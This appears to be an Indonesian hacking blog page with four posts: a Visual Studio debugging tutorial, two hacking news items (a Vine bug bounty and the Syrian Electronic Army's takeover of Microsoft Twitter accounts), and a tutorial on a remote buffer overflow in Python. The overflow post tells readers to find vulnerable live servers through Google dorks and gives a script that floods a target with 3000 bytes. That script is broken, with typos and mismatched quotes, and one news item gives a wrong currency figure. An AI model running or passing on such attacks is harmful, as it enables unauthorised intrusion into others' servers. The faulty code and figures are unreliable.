11/08/16

Cara Debug Code di Visual Studio

Exhacking.net - Dalam artikel ini kita akan belajar tentang bagaimana mendebug sebuah kode yang kita buat untuk mencari  sebuah bug yang masih menempel didalam kode tersebut agar software yang kita buat bisa bekerja dengan maksimal, disini juga kami akan menjelaskan  bagaimana melakukan breakpoints setup dan debugging hal terkait lainnya.

Apa yang di sebut Debugging?
Debugging adalah proses untuk menscan sebuah kode programan melalui eksekusi kode pada saat run-time dan mengevaluasi apakah kode yang ditulis bekerja seperti yang diharapkan.
Hal ini berguna untuk mencapai garis kode tertentu dan lebih lanjut,  Anda dapat menggali jauh ke dalam kode yang Anda tulis dari satu fungsi ke yang lain, melihat perubahan dalam nilai-nilai variabel dan melakukan lebih banyak lagi. Ini benar-benar membantu ketika Anda tidak dapat mencari tahu mengapa kode Anda tidak bekerja sesuai logika Anda.

Apa itu Breakpoint?
Untuk menggunakan debugging kita perlu breakpoints. Breakpoints adalah lokasi di baris kode di mana kita ingin memulai debugging.
Dari titik itu Anda dapat mengeksekusi setiap baris kode satu persatu, Anda juga dapat men-setup beberapa breakpoints.
Sekarang mari kita lihat bagaimana untuk memulai setup breakpoint.

Bagaimana Cara Mempersiapkan Breakpoint?
Sebuah breakpoint dapat dimulai  dengan dua cara, satu adalah dengan menggunakan mouse dan yang kedua menggunakan keyboard. Keduanya sama-sama mudah. Dengan mouse Anda hanya perlu klik pada vertikal cahaya abu-abu pada bar di kiri sejajar dengan kode. Sementara mengklik, mouse harus berada di depan garis kode yang diinginkan . Setelah klik Anda akan melihat lingkaran merah muncul pada bar abu-abu. Lihat di bawah screenshot untuk referensi.
Sekarang dalam kasus keyboard, Anda harus mengklik pada baris kode di mana Anda ingin membuat breakpoint dan kemudian hanya tekan tombol F9 dan lingkaran merah akan muncul seketika setelah menekan tombol.

Menghapus breakpoint mirip dengan pengaturan itu, Hanya melakukan langkah di atas lagi dan Anda akan melihat bahwa lingkaran merah menghilang dan dengan demikian breakpoint akan dihapus, Jadi dua cara di atas hanya mematikan breakpoint.

Bagaimana Cara Debug?
Sebagai contoh saya telah membuat software konsol sederhana menggunakan visual studio dan saya telah memasang breakpoint di kode tersebut, contoh seperti gambar di bawah .
Jika Anda tertarik untuk membuat software konsol sederhana ini, Anda dapat mencoba code di bawah ini.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ConsoleApp
{
    class Program
    {
        static void Main(string[] args)
        {
            int index = 0;
            for (int i = 0; i < 10; i++)
            {
                index = index + 1; //Incrementing index
            }
        }
    }
}
Sekarang tekan F5 untuk menjalankan Software ini, Anda akan melihat eksekusi akan berhenti di breakpoint dan pernyataan breakpoint aktif menjadi kuning, Pada tahap ini Anda dapat memeriksa nilai-nilai variabel dengan melayangkan cursor tepat di atas variabel seperti yang ditunjukkan pada gambar di bawah.
Ada empat kunci yang akan membantu Anda dalam debugging :
  1. F5 - Menjalankan eksekusi ke breakpoint berikutnya, di mulai hits breakpoint pertama
  2. F9 - Toggles breakpoint, set / Menghapus
  3. F10 - Langkah ke pernyataan kode berikutnya
  4. F11 - Langkah dalam kode fungsi jika pernyataan saat ini memiliki fungsi panggilan jika hanya beberapa langkah ke pernyataan kode berikutnya.
Selamat Belajar !!!

Exhacking.net - Dalam artikel ini kita akan belajar tentang bagaimana mendebug sebuah kode yang kita buat untuk mencari  sebuah bug yang ...

09/08/16

Ungkap Celah Vine, Hacker Ini Dapat Ratusan Juta dari Twitter

Exhacking.net - Twitter memberikan hadiah senilai US$ 10.080 atau sekitar Rp 141,5 juta kepada seorang hacker yang berhasil mengungkap celah keamanan Vine.

Hacker bernama Avinash Singh itu menemukan celah keamanan lantaran mengakses source code milik Vine. Kemudian, pada Maret lalu, pria asal India ini melaporkan temuannya kepada Twitter.

Tak lama setelahnya, perusahaan bentukan Jack Dorsey dan kawan-kawan ini memperbaiki celah yang ada dan menghadiahi Singh dengan sejumlah uang.

Singh yang menggunakan nama samaran 'avicode' mengatakan, ia telah menemukan 15 bugs di Twitter. Ia menemukan celah keamanan tertentu saat menyelidiki kerentanan pada sistem menggunakan Censys.io, sebuah mesin pemindai jaringan. Dengan mesin tersebut, Singh berhasil mengunduh seluruh source code Vine.

"Saya dapat melihat seluruh source code Vine, API key, dan kunci rahasia untuk pihak ketiga," tulis Singh dalam unggahan di blog pribadinya, seperti dilaporkan Mashable, Sabtu (30/7/2016).

Dengan source code tersebut, ia juga bisa menjalankan gambar tanpa perimeter apapun. Bahkan, jika Singh mau, dengan temuan itu ia bisa membuat sebuah replika Vine.

Singh juga menerima sejumlah hadiah dari program bug-bounty Twitter beberapa waktu lalu. Ia pernah menemukan transmisi berbahaya terkait file media, penyimpanan username dan password di aplikasi Vine Android.

Twitter sendiri mengungkap, dalam dua tahun terakhir, perusahaan memberikan hadiah US$ 322.420 atau sekitar Rp 4,3 triliun untuk program bug bounty guna membongkar celah keamanan pada sistem.

Perusahaan juga baru bersedia mengungkapkan adanya celah keamanan setelah celah itu berhasil diamankan. Sejak keberhasilannya, Singh juga aktif berpartisipasi dalam bug bounty Twitter. Menurutnya, Twitter selalu membereskan celah keamanan yang ada dengan cepat.

Exhacking.net - Twitter memberikan hadiah senilai US$ 10.080 atau sekitar Rp 141,5 juta kepada seorang hacker yang berhasil mengungkap cel...

08/08/16

Remote Buffer Overflow Exploit Dengan Python

Exhacking.net - Kali ini kami akan berbagi teknik hacking yang di sebut Remote Buffer Overflow Eksploitasi dengan Python yang bekerja hanya untuk TCP

Persiapan yang di butuhkan :
 - Python 3.4
- Koneksi internet
- Sebuah server rentan
- Komputer dengan Windows atau Linux


 1. Mencari server untuk pengujian
Ini lebih rumit, silahkan  cari Dorks di GHDB ( https://www.exploit-db.com/google-hacking-database/ ) atau untuk perangkat lunak rentan bisa di cari di situs Exploit-DB ( https://www.exploit-db.com ).

 2. Coding
Coding adalah bagian yang mudah. Mulai dari mengimpor sys dan socket, kemudian menulis kode berikut.
import sys
import socket

for carg in sys.argv:
            if carg == "-s":
                        argnum = sys.argv.index(carg)
                        argnum += 1
                        host = sys.argv[argnum]
            elif carg == "-p":
                        argnum = sys.argv.index(carg)
                        argnum += 1
                        port = sys.argv[argnum[
buffer = "\x41"* 3000
s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)
s.connect((host,port))
s.send("USV " + buffer + "//r//n//r”)
s.close() 
Sekarang mari kita menganalisis kode tersebut.
Baris kedua membuat penyangga, yaitu \ X41 dikalikan 3000 kali. Kemudian kita melihat garis yang menyatakan sebagai socket, baris tersebut menghubungkan dan  mengirimkan buffer dan menutup socket.
Sedangkan di bagian Host dan Port silahkan kalian ganti dengan Host dan Port target.

Setelah kita  melakukan langkah-langkah di atas, mari kita uji coba dengan menjalankan script tersebut, jika berhasil akan terlihat seperti gambar di bawah ini

Selamat mencoba :)

Exhacking.net - Kali ini kami akan berbagi teknik hacking yang di sebut Remote Buffer Overflow Eksploitasi dengan Python yang bekerja ha...

07/08/16

Hacker Suriah Berhasil Mengambil Alih Akun Twitter Microsoft

 Exhacking.net - Para hacker Suriah yang tergabung dalam Syria Electronic Army (SEA) baru saja menyerang akun Twitter milik Microsoft. Para hacker tersebut pun sempat menuliskan beberapa Tweet di akun tersebut. Namun pada saat ini, Microsoft berhasil mengambil alih akun tersebut.

Melalui akun Twitter @MSFTnews milik Microsoft, para hacker itu pun menyampaikan pesannya kepada publik. Mereka mengatakan bahwa Microsoft menjual dan memberikan data user Outlook serta Hotmail kepada pemerintah.
Tak hanya akun Twitter @MSFTnews. Para hacker tersebut juga sebelumnya mengambil alih akun @XboxSupport. Akun ini pun sempat berada di kendali para hacker sekitar satu jam. Selanjutnya, Microsoft pun membersihkan sisa-sisa keberadaan SEA di akun tersebut.

 Exhacking.net - Para hacker Suriah yang tergabung dalam Syria Electronic Army (SEA) baru saja menyerang akun Twitter milik Microsoft. Pa...